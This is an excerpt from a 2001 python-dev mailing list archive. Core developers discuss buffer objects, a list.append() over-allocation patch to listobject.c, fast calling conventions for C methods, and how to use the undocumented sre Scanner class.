10:23:10AM +0200 References: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz> <3B0E166E.581816AA@lemburg.com> Message-ID: <20010525045923.C12056@lyra.org> On Fri, May 25, 2001 at 10:23:10AM +0200, M.-A. Lemburg wrote: > Greg Ewing wrote: > > "M.-A. Lemburg" : > > > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > > Then you could write: buffer(ob).find('.'). > > > > Aren't buffer objects as they're currently implemented > > inherently dangerous? > > Why should they be ?
The buffer object caches the pointer from getreadbuffer and friends. If the target object changes that pointer (internally), then the buffer object's value is stale. But that is a bug fix; it is independent of the discussion at hand. Cheers, -g -- Greg Stein, http://www.lyra.org/ From Barrett at stsci.edu Fri May 25 15:21:20 2001 From: Barrett at stsci.edu (Paul Barrett) Date: Fri, 25 May 2001 09:21:20 -0400 Subject: [Python-Dev] strop vs. string References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> Message-ID: <3B0E5C50.6E365F69@STScI.Edu> "M.-A. Lemburg" wrote: > > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > > Then you could write: buffer(ob).find('.'). > > > > You're totally missing the point with that suggestion. It does *not* > > suffice to add them to buffer objects. What about array objects? mmap > > objects? Random Joe Object who implements the buffer interface? > > That's the point: you can wrap all those into a buffer object > and then use the buffer object methods to manipulate them. In > that sense, buffer objects provide an adaptor to the underlying > object which implements the needed methods. Sounds like you are trying to make the buffer object into something it is not. Not that I have the foggiest idea what it is now, since it hasn't much use and is badly broken. I like your idea of sharing functions, I just don't think the buffer object is the proper means. I think the buffer object should be removed from Python and something better put in its place. (I'm not talking about the buffer C/API, though this could also use an overhaul, since it doesn't provide enough information to the receiving method.) What I think we need is: 1) a malloc object which has a similar interface to the mmap object with access protection, etc. This object would be the fundamental way of getting memory. 
The string object would use it to allocate a chunk of 'read-only' memory. Other objects would then know not to modify the contents of the memory. If you wanted a reference or view of the memory/buffer, you would get a reference to this object. 2) objects supporting the buffer object should provide a view method which returns a copy of themselves (and hence all their methods) and can be used to get a pointer to a subset of its memory. In this way the type of memory/buffer being accessed is known compared to the current buffer object which only indicates the buffer is binary or char data. In essence information about how the buffer should be used is lost in the current buffer C/API. -- Paul Barrett, PhD Space Telescope Science Institute Phone: 410-338-4475 ESS/Science Software Group FAX: 410-338-4767 Baltimore, MD 21218 From guido at digicool.com Fri May 25 16:29:28 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 25 May 2001 10:29:28 -0400 Subject: [Python-Dev] Vacation Message-ID: <200105251429.f4PETSd10633@odiug.digicool.com> I will be on vacation next week without net access. Back on June 4th! There's a bunch of stuff that happened on the mailing list that I expect I won't get to -- I've got to finish up some high priority work for Digital Creations before I can leave. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Fri May 25 21:06:16 2001 From: tim.one at home.com (Tim Peters) Date: Fri, 25 May 2001 15:06:16 -0400 Subject: [Python-Dev] Time for the yearly list.append() panic Message-ID: c.l.py has rediscovered the quadratic-time worst-case behavior of list.append(). That is, do list.append(x) in a long loop. Linux users don't see anything particularly bad no matter how big the loop. WinNT eventually displays clear quadratic-time behavior. 
Win9x dies surprisingly early with a MemoryError, despite gobs of memory free: turns out Win9x allocates hundreds of virtual heaps, isn't able to coalesce them, and you actually run out of *address space* (the whole 2GB user space gets fragmented beyond hope). People on other platforms have reported other bad behaviors over the years. I don't want to argue about this again , I just want to know whether the patch below slows anything down on your oddball box. It increases the over-allocation amount in several more layers. Also replaces integer * and / in the over-allocation computation by bit operations (integer / in particular is very slow on *some* boxes). Long-term we should teach PyMalloc about Python's realloc() abuses and craft a cooperative solution.

Index: Objects/listobject.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/listobject.c,v
retrieving revision 2.92
diff -c -r2.92 listobject.c
*** Objects/listobject.c 2001/02/12 22:06:02 2.92
--- Objects/listobject.c 2001/05/25 19:04:07
***************
*** 9,24 ****
  #include /* For size_t */
  #endif
  
! #define ROUNDUP(n, PyTryBlock) \
!         ((((n)+(PyTryBlock)-1)/(PyTryBlock))*(PyTryBlock))
  
  static int
  roundupsize(int n)
  {
!     if (n < 500)
          return ROUNDUP(n, 10);
      else
!         return ROUNDUP(n, 100);
  }
  
  #define NRESIZE(var, type, nitems) PyMem_RESIZE(var, type, roundupsize(nitems))
--- 9,30 ----
  #include /* For size_t */
  #endif
  
! #define ROUNDUP(n, nbits) \
!         ( ((n) + (1<<(nbits)) - 1) >> (nbits) << (nbits) )
  
  static int
  roundupsize(int n)
  {
!     if ((n >> 9) == 0)
!         return ROUNDUP(n, 3);
!     else if ((n >> 13) == 0)
!         return ROUNDUP(n, 7);
!     else if ((n >> 17) == 0)
          return ROUNDUP(n, 10);
+     else if ((n >> 20) == 0)
+         return ROUNDUP(n, 13);
      else
!         return ROUNDUP(n, 18);
  }
  
  #define NRESIZE(var, type, nitems) PyMem_RESIZE(var, type, roundupsize(nitems))

From martin at loewis.home.cs.tu-berlin.de Fri May 25 21:51:26 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Fri, 25 May 2001 21:51:26 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <3B0E1E2C.4BC121B5@lemburg.com> (mal@lemburg.com) References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> Message-ID: <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> > Now this would be more flexible if you would implement a scheme > which lets us put the parser string into the method list. The > call mechanism could then easily figure out how to call the > method and it would also be more easily extensible: > > {"append", (PyCFunction)listappend, METH_DIRECT, append_doc, "O"}, I'd like to hear other people's comment on this specific issue, so I guess I should probably write a PEP outlining the options. My immediate reaction to your proposal is that it only complicates the interface without any savings. We still can only support a limited number of calling conventions. E.g. it is not possible to write portable C code that does all the calling conventions for "l", "ll", "lll", "llll", and so on - you have to cast the function pointer to the right prototype, which must be done in source code. So with this interface, you may end up at run-time finding out that you cannot support the signature. With the current patch, you'd have to know to convert "OO" into METH_OO, which I think is not asked too much - and it gives you a compile-time error if you use an unsupported calling convention. > A parser marker "OO" would then call a method like this: > > method(self, arg0, arg1) > > and so on. That is indeed the plan, but since you have to code the parameter combinations in C code, you can only support so many of them.
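Martin's objection to storing the parser string in the method table can be illustrated with a small Python model. Assume, hypothetically, that the interpreter has hand-written dispatch code for only a few signatures; `SHAPES` and `bind_method()` are invented for this sketch and do not correspond to any CPython API. With the format string in the table, a signature that has no matching dispatch code is only detected when the table is processed at run time, whereas a missing METH_xxx flag would already fail to compile. The optional "O|O" shape passes None for an omitted argument, standing in for a C NULL pointer.

```python
# Hypothetical: the finite set of call shapes the interpreter has dispatch
# code for, each mapped to (minimum, maximum) number of arguments.
SHAPES = {"O": (1, 1), "OO": (2, 2), "O|O": (1, 2)}


def bind_method(func, fmt):
    """Return a caller for func, or fail if fmt has no specialised shape."""
    if fmt not in SHAPES:
        # With format strings in the method table this surfaces at run time;
        # an undefined METH_xxx flag would be rejected by the C compiler.
        raise ValueError(f"no specialised calling convention for {fmt!r}")
    min_args, max_args = SHAPES[fmt]

    def call(self, *args):
        if not min_args <= len(args) <= max_args:
            raise TypeError(
                f"expected {min_args} to {max_args} arguments, got {len(args)}")
        # Pad omitted optional arguments with None (a stand-in for C NULL).
        padded = args + (None,) * (max_args - len(args))
        return func(self, *padded)

    return call
```

For example, `bind_method(f, "O")` succeeds for a one-argument function, while `bind_method(f, "ll|l")` raises ValueError because no dispatch code exists for that shape.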
> allows implementing a generic scheme which > then again relies on PyArg_ParseTuple() to do the argument > parsing, e.g. "is#" could be implemented as: The point of the patch is to get rid of PyArg_ParseTuple in the "common case". For functions with complex calling conventions, getting rid of the PyArg_ParseTuple string parsing is not that important, since they are expensive, anyway (not that "is#" couldn't be supported, I'd call it METH_is_hash). > For optional arguments we'd need some convention which then > lets the called function add the default value as needed. For the moment, I'd only support "|O", and perhaps "|z"; an omitted argument would be represented as a NULL pointer. That means that "|i" couldn't participate in the fast calling convention - unless we translate that to void foo(PyObject*self, int i, bool ipresent); BTW, the most frequent function in my measurements that would make use of this convention is "OO|i:replace", which scores at 4.5%. Regards, Martin From gstein at lyra.org Fri May 25 22:27:52 2001 From: gstein at lyra.org (Greg Stein) Date: Fri, 25 May 2001 13:27:52 -0700 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0E5C50.6E365F69@STScI.Edu>; from Barrett@stsci.edu on Fri, May 25, 2001 at 09:21:20AM -0400 References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> <3B0E5C50.6E365F69@STScI.Edu> Message-ID: <20010525132752.B5402@lyra.org> On Fri, May 25, 2001 at 09:21:20AM -0400, Paul Barrett wrote: > "M.-A. Lemburg" wrote: > > > > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > > > Then you could write: buffer(ob).find('.'). > > > > > > You're totally missing the point with that suggestion. It does *not* > > suffice to add them to buffer objects. What about array objects? mmap > > objects? Random Joe Object who implements the buffer interface? 
> > > > That's the point: you can wrap all those into a buffer object > > and then use the buffer object methods to manipulate them. In > > that sense, buffer objects provide an adaptor to the underlying > > object which implements the needed methods. > > Sounds like you are trying to make the buffer object into something it > is not. The buffer object is intended to provide a Python-level object (with methods and behavior) for any other object which exports the buffer API (but not those particular methods/behavior). It was added for Python 1.5.2, but did not keep up with the methods added to the string object. Arguably, it is out of date rather than "[turning it into] something it is not." > Not that I have the foggiest idea what it is now, since it > hasn't much use and is badly broken. "badly" is overstating the problem. It caches a pointer when it shouldn't. This doesn't work well when using it with array objects or PIL's image objects. Most objects, it is fine. The buffer object is also very good for C/Python extensions and embedding code. It provides a Python-level view on a block of memory. Using a string object implies making a copy, and it removes the possibility for read/write access to that memory. And you state: "Not that I have the foggiest idea what it is now". If so, then wtf are you making statements about the buffer object's behavior? > I like your idea of sharing functions, I just don't think the buffer > object is the proper means. I think the buffer object should be > removed from Python and something better put in its place. (I'm not > talking about the buffer C/API, though this could also use an > overhaul, since it doesn't provide enough information to the receiving > method.) > > What I think we need is: > > 1) a malloc object which has a similar interface to the mmap object > with access protection, etc. This object would be the fundamental way > of getting memory. The string object would use it to allocate a chunk > of 'read-only' memory. 
Other objects would then know not to modify > the contents of the memory. If you wanted a reference or view of the > memory/buffer, you would get a reference to this object. You're talking about the buffer object that we have *today*. It can refer to another object (i.e. the memory exposed via the other object's buffer API), refer to memory, or it can allocate its own memory. The buffer object can be marked read-only, or read-write. > 2) objects supporting the buffer object should provide a view method > which returns a copy of themselves (and hence all their methods) and > can be used to get a pointer to a subset of its memory. In this way > the type of memory/buffer being accessed is known compared to the > current buffer object which only indicates the buffer is binary or > char data. In essence information about how the buffer should be used > is lost in the current buffer C/API. I'm not sure that I understand this paragraph. No... what needs to happen is to have the bug in PyBufferObject fixed. Then to refactor stringobject.c and stropmodule.c to move all of those byte-oriented processing functions into a new file such as Python/byteops.c (whatever; name isn't important). Ideally, stringobject.c and stropmodule.c would be simple covers over the same functions. Those functions can then be used by PyBufferObject to implement the rest of the string methods on itself. This would leave us at MAL's suggested point: via the buffer object, we can perform all of the standard string methods/ops on any object that implements the buffer API. Cheers, -g -- Greg Stein, http://www.lyra.org/ From mal at lemburg.com Fri May 25 23:16:32 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 25 May 2001 23:16:32 +0200 Subject: [Python-Dev] Time for the yearly list.append() panic References: Message-ID: <3B0ECBB0.6798F4AB@lemburg.com> Tim Peters wrote: > > Long-term we should teach PyMalloc about Python's realloc() abuses and craft a cooperative solution. 
That's what I think too. There's really not much point in trying to work around poor malloc() implementations when we've already got the cure built into Python... I just wish Vladimir would resurface again to complete his great work (AFAIK, pymalloc still has problems with threads). -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Fri May 25 23:38:15 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 25 May 2001 23:38:15 +0200 Subject: [Python-Dev] Special-casing "O" References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> Message-ID: <3B0ED0C7.F1A665EA@lemburg.com> "Martin v. Loewis" wrote: > > > Now this would be more flexible if you would implement a scheme > > which lets us put the parser string into the method list. The > > call mechanism could then easily figure out how to call the > > method and it would also be more easily extensible: > > > > {"append", (PyCFunction)listappend, METH_DIRECT, append_doc, "O"}, > > I'd like to hear other people's comment on this specific issue, so I > guess I should probably write a PEP outlining the options. > > My immediate reaction to your proposal is that it only complicates the > interface without any savings. We still can only support a limited > number of calling conventions. E.g. it is not possible to write > portable C code that does all the calling conventions for "l", "ll", > "lll", "llll", and so on - you have to cast the function pointer to > the right prototype, which must be done in source code. > > So with this interface, you may end up at run-time finding out that > you cannot support the signature. 
With the current patch, you'd have > to know to convert "OO" into METH_OO, which I think is not asked too > much - and it gives you a compile-time error if you use an unsupported > calling convention. True. It's unfortunate that C doesn't offer the reverse of varargs.h... > > A parser marker "OO" would then call a method like this: > > > > method(self, arg0, arg1) > > > > and so on. > > That is indeed the plan, but since you have to code the parameter > combinations in C code, you can only support so many of them. > > > allows implementing a generic scheme which > > then again relies on PyArg_ParseTuple() to do the argument > > parsing, e.g. "is#" could be implemented as: > > The point of the patch is to get rid of PyArg_ParseTuple in the > "common case". For functions with complex calling conventions, getting > rid of the PyArg_ParseTuple string parsing is not that important, > since they are expensive, anyway (not that "is#" couldn't be > supported, I'd call it METH_is_hash). > > > For optional arguments we'd need some convention which then > > lets the called function add the default value as needed. > > For the moment, I'd only support "|O", and perhaps "|z"; an omitted > argument would be represented as a NULL pointer. That means that "|i" > couldn't participate in the fast calling convention - unless we > translate that to > > void foo(PyObject*self, int i, bool ipresent); > > BTW, the most frequent function in my measurements that would make use > of this convention is "OO|i:replace", which scores at 4.5%. I was thinking of using pointer indirection for this: foo(PyObject *self, int *i) If i is given as argument, *i is set to the value, otherwise i is set to NULL. 
-- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one at home.com Sat May 26 00:11:43 2001 From: tim.one at home.com (Tim Peters) Date: Fri, 25 May 2001 18:11:43 -0400 Subject: [Python-Dev] Time for the yearly list.append() panic In-Reply-To: <3B0ECBB0.6798F4AB@lemburg.com> Message-ID: [Tim] > Long-term we should teach PyMalloc about Python's realloc() > abuses and craft a cooperative solution. [MAL] > That's what I think too. There's really not much point in trying > to work around poor malloc() implementations when we've already > got the cure built into Python... The point *here* is that a simple localized patch could kill off a Frequently Irritating Complaint without further ado: on my personal cost/benefit scale, it's all I can *afford* to do now. PyMalloc likely won't solve it as-is x-platform, without new work to accommodate extreme realloc() abuse. > I just wish Vladimir would resurface again to complete his great > work I'd like him to come back even if he doesn't . > (AFAIK, pymalloc still has problems with threads). It has lock macros that haven't been #define'd to do anything yet. But part of the potential value of the Python core using its own allocator is to exploit the global interpreter lock to *not* lock in the allocator. Messy issues. Python should grow a cheaper platform-specific flavor of internal lock too. (Jeremy pointed out some code the other day that jumps through hoops to simulate a reentrant lock on top of a Python lock; an irony is that on Windows, the native lock *is* reentrant already, and Python jumps through hoops to make it act as if it weren't ) From mal at lemburg.com Sat May 26 00:07:00 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sat, 26 May 2001 00:07:00 +0200 Subject: [Python-Dev] strop vs. 
string References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> <3B0E5C50.6E365F69@STScI.Edu> <20010525132752.B5402@lyra.org> Message-ID: <3B0ED784.FC53D01@lemburg.com> Greg Stein wrote: > > No... what needs to happen is to have the bug in PyBufferObject fixed. Then > to refactor stringobject.c and stropmodule.c to move all of those > byte-oriented processing functions into a new file such as Python/byteops.c > (whatever; name isn't important). Ideally, stringobject.c and stropmodule.c > would be simple covers over the same functions. > > Those functions can then be used by PyBufferObject to implement the rest of > the string methods on itself. > > This would leave us at MAL's suggested point: via the buffer object, we can > perform all of the standard string methods/ops on any object that implements > the buffer API. I wonder how we could achieve this without copy&pasting all the needed methods from stringobject.c to bufferobject.c.... all the string methods use the string object layout directly rather than just dealing with a pointer and a length. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From m.favas at per.dem.csiro.au Sat May 26 04:34:20 2001 From: m.favas at per.dem.csiro.au (Mark Favas) Date: Sat, 26 May 2001 10:34:20 +0800 Subject: [Python-Dev] Time for the yearly list.append() panic Message-ID: <3B0F162C.AD16E452@per.dem.csiro.au> [Tim wants to know whether his patch to listobject.c slows anything down on anyone's "oddball box"...] While in no way admitting that mine is an oddball box , it being a Tru64 Unix alpha processor machine, I do see a slowdown after applying the patch (measured on the test suite and on pystone). However, it's only of the order of 0.5 to 1%. 
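To see what the patched roundupsize() actually requests, here is a Python transcription of both versions from Tim's diff. It is a sketch for experimenting, not the C code itself: Python's floor division stands in for C integer division (they agree for the non-negative sizes used here), and `count_size_changes()` is an invented helper that counts how often the rounded allocation size changes while appending items one at a time, which approximates how often realloc() is asked for a genuinely different block.

```python
def roundup(n, nbits):
    """Round n up to a multiple of 2**nbits with shifts (new ROUNDUP macro)."""
    return ((n + (1 << nbits) - 1) >> nbits) << nbits


def roundupsize_new(n):
    """Transcription of the patched roundupsize()."""
    if (n >> 9) == 0:        # n < 512: multiples of 8
        return roundup(n, 3)
    elif (n >> 13) == 0:     # n < 8192: multiples of 128
        return roundup(n, 7)
    elif (n >> 17) == 0:     # n < 131072: multiples of 1024
        return roundup(n, 10)
    elif (n >> 20) == 0:     # n < 1048576: multiples of 8192
        return roundup(n, 13)
    else:                    # larger: multiples of 262144
        return roundup(n, 18)


def roundupsize_old(n):
    """Transcription of the original roundupsize(), using division."""
    block = 10 if n < 500 else 100
    return ((n + block - 1) // block) * block


def count_size_changes(roundupsize, nitems):
    """Count how often the rounded size changes while appending nitems."""
    changes = 0
    size = roundupsize(0)
    for n in range(1, nitems + 1):
        new_size = roundupsize(n)
        if new_size != size:
            changes += 1
            size = new_size
    return changes
```

For a million appends, the old rule changes the requested size 10045 times and the new one 351 times, which is why the deeper over-allocation layers matter for platforms whose realloc() copies on every growth.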
slightly-oddly y'rs - Mark -- Mark Favas - m.favas at per.dem.csiro.au CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA From tim.one at home.com Sat May 26 06:05:40 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 26 May 2001 00:05:40 -0400 Subject: [Python-Dev] Time for the yearly list.append() panic In-Reply-To: <3B0F162C.AD16E452@per.dem.csiro.au> Message-ID: [Mark Favas] > [Tim wants to know whether his patch to listobject.c slows anything down > on anyone's "oddball box"...] > > While in no way admitting that mine is an oddball box , Heh -- of course not. I had more in mind obscure OSes like Linux . > it being a Tru64 Unix alpha processor machine, I do see a slowdown > after applying the patch (measured on the test suite and on pystone). > However, it's only of the order of 0.5 to 1%. Now that's very odd, since Alpha has about the slowest integer division on Earth, and every list append was doing an int div before the patch but not after. I'm afraid that timing the test suite before and after is a red herring, as several of the expensive tests have (pseudo)random components and can do an amount of work that varies depending on system time at the time random.py is first imported. pystone is even odder: the relevant code in listobject.c is never executed during pystone! I suspected that because pystone is an old synthetic Ada benchmark simulating a pile of integer systems programs, so pystone is unique among Python programs in not exercising any of Python's useful features -- a breakpoint in the debugger just now confirmed it (never did a list resize after compilation finished). So I'm pretty sure that after I check it in, you'll see a speedup instead . Get anywhere identifying why your other app is 20% slower (blast from the past)? From martin at loewis.home.cs.tu-berlin.de Sat May 26 07:28:32 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v.
Loewis) Date: Sat, 26 May 2001 07:28:32 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <3B0ED0C7.F1A665EA@lemburg.com> (mal@lemburg.com) References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> Message-ID: <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> > I was thinking of using pointer indirection for this: > > foo(PyObject *self, int *i) > > If i is given as argument, *i is set to the value, otherwise > i is set to NULL. That is a good idea; I'll try to update my patch to more calling conventions. Regards, Martin From tim.one at home.com Sat May 26 08:44:04 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 26 May 2001 02:44:04 -0400 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0ED784.FC53D01@lemburg.com> Message-ID: The buffer object has been neglected for years: is that because it's in prime shape, or because nobody cares about it enough to maintain it? "The bug" has been known for years without any action taken to address it; the docs give up in spots and nobody addresses that either (like "The current policy seems to state that these characters may be multi-byte characters" -- well, yes or no?); the builtin buffer() function isn't called anywhere in the std test suite; the file object still has an undocumented readinto() method that just confuses people who bump into it; and it's so obscure in daily life that it appears Guido didn't even think of it when adding iterators for the other sequence types. I expect that answers my question . Is someone (Greg? MAL?) going to champion it now? That would be cool. About combining strop and buffers and strings, don't forget unicodeobject.c: that's got oodles of basically duplicate code too. /F suggested dealing with the minor differences via maintaining one code file that gets compiled multiple times w/ appropriate #defines. 
From tim.one at home.com Sat May 26 10:14:06 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 26 May 2001 04:14:06 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> Message-ID: I don't want to see us duplicate the guts of PyArg_ParseTuple() inside do_call_special(). METH_O is a cool idea, METH_l is marginal, and the new code is already slower for METH_O than it needs to be in order to support the *possibility* of METH_l too (stacks and loops and switch stmts and an extra layer of do_call_special function call "just in case"). Do METH_O, convert every "O" function to use it, declare victory, and enjoy the weekend . 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code- size-ly y'rs - tim From m.favas at per.dem.csiro.au Sat May 26 10:30:29 2001 From: m.favas at per.dem.csiro.au (Mark Favas) Date: Sat, 26 May 2001 16:30:29 +0800 Subject: [Python-Dev] Time for the yearly list.append() panic References: Message-ID: <3B0F69A5.6F569573@per.dem.csiro.au> [Tim tells Mark that his observations reflect more Brownian motion (pseudo!) than reality...] > [Mark Favas] > > it being a Tru64 Unix alpha processor machine, I do see a slowdown > > after applying the patch (measured on the test suite and on pystone). > > However, it's only of the order of 0.5 to 1%. > > Now that's very odd, since Alpha has about the slowest integer division on > Earth, and every list append was doing an int div before the patch but not > after. > > I'm afraid that timing the test suite before and after is a red herring, as > several of the expensive tests have (pseudo)random components and can do an > amount of work that varies depending on system time at the time random.py is > first imported. > > pystone is even odder: the relevant code in listobject.c is never executed > during pystone!
I suspected that because pystone is an old synthetic Ada > benchmark simulating a pile of integer systems programs, so pystone is > unique among Python programs in not exercising any of Python's useful > features -- a breakpoint in the debugger just now confirmed it (never > did a list resize after compilation finished). > > So I'm pretty sure that after I check it in, you'll see a speedup instead > . OK : this time, instead of making unwarranted assumptions about test suites and pystones , I wrote and ran a test that I _think_ should exercise the code (at least, it does lots of list.append()s), and, yes, the newly checked-in code's about 3-4% faster compared with the original version of, well, days ago. > > Get anywhere identifying why your other app is 20% slower (blast from the > past)? No, not yet. The profiling results at first eyeball seemed hard to match up, so I put it off for a rainy weekend. And Perth's drought has just broken... Will attempt to make sense of it. Interesting that Marc Andre seemed to get a somewhat similar slowdown between 1.52 and 2.0. -- Mark Favas - m.favas at per.dem.csiro.au CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA From mal at lemburg.com Sat May 26 11:54:12 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sat, 26 May 2001 11:54:12 +0200 Subject: [Python-Dev] Special-casing "O" References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> Message-ID: <3B0F7D44.1A12CE0F@lemburg.com> "Martin v. Loewis" wrote: > > > I was thinking of using pointer indirection for this: > > > > foo(PyObject *self, int *i) > > > > If i is given as argument, *i is set to the value, otherwise > > i is set to NULL. > > That is a good idea; I'll try to update my patch to more calling > conventions. 
This morning another idea popped up which could help us with handling generic calling schemes: How about making *all* parameters pointers ?! The calling mechanism would then just have to deal with a changing number of parameters and not with different types (this is how PyArg_ParseTuple() works too if I remember correctly). We could easily provide calling schemes for 1 - n arguments that way and the types of these arguments would be defined by the parser string just like before. Examples:

  foo(PyObject *self, PyObject *obj, int *i)
  bar(PyObject *self, int *i, int *j, char *txt, int *len)

To call these, the calling mechanism would have to cast these to:

  foo(void *, void *, void *)
  bar(void *, void *, void *, void *, void *)

Wouldn't this work ? -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From paulp at ActiveState.com Sat May 26 17:02:08 2001 From: paulp at ActiveState.com (Paul Prescod) Date: Sat, 26 May 2001 08:02:08 -0700 Subject: [Python-Dev] Scanner Message-ID: <3B0FC570.17707787@ActiveState.com> What ever happened to the sre Scanner? It seemed like a good idea but it was not documented and it doesn't work for me. Is it just a case of nobody got around to the documentation or have we decided against it? Here's the code that doesn't work for me:

  from sre import Scanner

  scanner = Scanner([
      (r"[a-zA-Z_]\w*", None),
      (r"\d+\.\d*", None),
      (r"\d+", None),
      (r"=|\+|-|\*|/", None),
      (r"\s+", None),
      ])

  tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")

  Traceback (most recent call last):
    File "junk.py", line 11, in ?
      tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")
    File "c:\program files\python21\lib\sre.py", line 254, in scan
      action = self.lexicon[m.lastindex][1]
  TypeError: sequence index must be integer

m.lastindex is None -- Take a recipe. Leave a recipe. Python Cookbook!
http://www.ActiveState.com/pythoncookbook From mal at lemburg.com Sat May 26 17:47:47 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sat, 26 May 2001 17:47:47 +0200 Subject: [Python-Dev] strop vs. string References: Message-ID: <3B0FD023.C4588919@lemburg.com> Tim Peters wrote: > > The buffer object has been neglected for years: is that because it's in > prime shape, or because nobody cares about it enough to maintain it? "The > bug" has been known for years without any action taken to address it; the > docs give up in spots and nobody addresses that either (like "The current > policy seems to state that these characters may be multi-byte characters" -- > well, yes or no?); the builtin buffer() function isn't called anywhere in > the std test suite; the file object still has an undocumented readinto() > method that just confuses people who bump into it; and it's so obscure in > daily life that it appears Guido didn't even think of it when adding > iterators for the other sequence types. > > I expect that answers my question . Is someone (Greg? MAL?) going to > champion it now? That would be cool. I believe that nobody really likes the buffer interface enough to let the world know about it, except maybe Greg ;-) Even the idea of replacing the usage of strings as data buffers with buffer objects didn't get very far; common habits are simply hard to break. > About combining strop and buffers and strings, don't forget unicodeobject.c: > that's got oodles of basically duplicate code too. /F suggested dealing > with the minor differences via maintaining one code file that gets compiled > multiple times w/ appropriate #defines. Hmm, that only saves us a few kB in source, but certainly not in the object files. The better idea would be making the types subclass from a generic abstract string object -- I just don't know how this will be possible with Guido's type patches. We'll just have to wait, I guess.
-- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one at home.com Sat May 26 23:15:11 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 26 May 2001 17:15:11 -0400 Subject: [Python-Dev] Scanner In-Reply-To: <3B0FC570.17707787@ActiveState.com> Message-ID: [Paul Prescod] > What ever happened to the sre Scanner? It seemed like a good idea > but it was not documented I previously urged /F to document, and Python-Dev to accept, the .lastindex and .lastgroup match object extensions, but to date got no response. Whether to adopt the Scanner class too is fuzzier, since AFAICT almost nobody has figured out how to use it. > and it doesn't work for me. This isn't a code problem, it's a failure to reverse-engineer the undocumented API . > Is it just a case of nobody got around to the documentation or have > we decided against it? WRT Scanner, partly the former, nothing of the latter, mostly that there's been no discussion of the API at all. WRT lastindex and lastgroup, I think purely the former. > Here's the code that doesn't work for me: > > from sre import Scanner > > scanner = Scanner([ > (r"[a-zA-Z_]\w*", None), > (r"\d+\.\d*", None), > (r"\d+", None), > (r"=|\+|-|\*|/", None), > (r"\s+", None), > ]) 1. Every tokenization regexp must contain exactly one capturing group. The lack above is the source of your later TypeError. Unclear to me whether that was the intent, or just the way the code happens to work today. 2. When an action is None, the substring matched by the pattern will be thrown away. You need to supply non-None actions if you want anything to show up in the token list. > tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar") > > Traceback (most recent call last): > File "junk.py", line 11, in ?
> tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar") > File "c:\program files\python21\lib\sre.py", line 254, in scan > action = self.lexicon[m.lastindex][1] > TypeError: sequence index must be integer > > m.lastindex is None

Here's a working rewrite:

  from sre import Scanner

  def retrieve(scanner, group):
      return group

  scanner = Scanner([
      (r"([a-zA-Z_]\w*)", retrieve),
      (r"(\d+\.\d*)", retrieve),
      (r"(\d+)", retrieve),
      (r"(=|\+|-|\*|/)", retrieve),
      (r"(\s+)", None),  # ignore whitespace
      ])

